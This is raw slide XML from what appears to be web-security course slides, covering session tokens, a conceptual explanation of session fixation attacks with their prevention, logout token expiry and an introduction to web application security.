        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST /do-login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56337" name="Straight Arrow Connector 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D35378-DC20-F249-BBD6-265E59832E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3657600" y="5026025"/>
            <a:ext cx="5181600" cy="0"/>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38" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF02C0B9-9F28-7248-80AB-0B3D34B55700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4657725" y="4795838"/>
            <a:ext cx="2824812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set logged-in session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56333" name="Straight Arrow Connector 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5411E2D6-D8C8-6C41-B492-25C83F8D69F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5789614"/>
            <a:ext cx="5105400" cy="158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34" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C0027F-DD80-BF4B-A65C-0697A4C56FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="5443061"/>
            <a:ext cx="2486578" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST /checkout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>logged-in session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BF5C3B-240E-904A-8520-4A2812800225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8567738" y="3890146"/>
            <a:ext cx="1719262" cy="791049"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B00E371-BCD1-2E47-ABEF-835DE2717DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8567738" y="5361470"/>
            <a:ext cx="1719262" cy="727504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C313D5E2-2587-EF4D-901F-0F2C00A4EED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6222637" y="2668302"/>
            <a:ext cx="1015920" cy="1302840"/>
            <a:chOff x="7254748" y="2552068"/>
            <a:chExt cx="1015920" cy="130284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A4AB461-7A5A-A345-97E2-517D5803571B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7695028" y="2552068"/>
                <a:ext cx="389880" cy="1302840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2" name="Ink 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4AB461-7A5A-A345-97E2-517D5803571B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7632028" y="2489068"/>
                  <a:ext cx="515520" cy="142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CE12C31-1377-814C-8D9F-770A80DDB9B6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7254748" y="2596348"/>
                <a:ext cx="437400" cy="432360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE12C31-1377-814C-8D9F-770A80DDB9B6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7192108" y="2533348"/>
                  <a:ext cx="563040" cy="55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7ECFE36-0096-9343-B804-362880A88A65}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7731748" y="2606428"/>
                <a:ext cx="538920" cy="302400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ECFE36-0096-9343-B804-362880A88A65}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7668748" y="2543428"/>
                  <a:ext cx="664560" cy="428040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116649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75" name="Rectangle 74">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34818" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66C894A-CB3C-EA45-B77A-3FBCC6F64125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Fixation Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893C0AEF-AF7B-3349-84C2-9E0691DD7288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478123" y="559477"/>
            <a:ext cx="5888571" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker obtains an anonymous session token (AST) for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Sets user’s session token to attacker’s AST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>URL tokens: trick user into clicking on URL with the attacker’s token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookie tokens: need an XSS exploit (more later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User logs into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker’s token becomes logged-in token!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>Can use this token to hijack user’s session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17018197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2F71FBF9-E3C6-0A4F-851F-FA2342040132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Preventing Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC39484E-063F-1145-AA7F-13554CE6DEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="8639060" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>When elevating user from anonymous to logged-in, always issue a new session token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Once user logs in, token changes to value unknown to attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3826446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36866" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1717CA9-C889-6F44-81EE-1573DF07BC18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723619" y="891241"/>
            <a:ext cx="3939084" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Logout Issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Connector 77">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531" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D9AD92B-03E8-AA45-B2CE-0590820A9488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300811" y="891241"/>
            <a:ext cx="6244851" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Functionality: allow login as a different user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Security: prevent others from abusing account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What happens during logout?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Delete session token from client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mark session token as expired on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Many sites forget to mark token as expired, enabling session hijacking after logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Attacker can use old token to access account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14312995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93187" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9188584E-D713-864D-8948-5DFECD71AED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93186" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF1B0D6C-BB87-E542-B32D-E946D1877CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963690" y="1000370"/>
            <a:ext cx="6361851" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Big trend: software as a Web-based service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Online banking, shopping, government, bill payment, tax prep, customer relationship management, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cloud-hosted applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Application code split between client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Client (Web browser): JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server: PHP, Ruby, Java, Perl, ASP …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Security is rarely the main concern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Poorly written scripts with inadequate input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Inadequate protection of sensitive data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
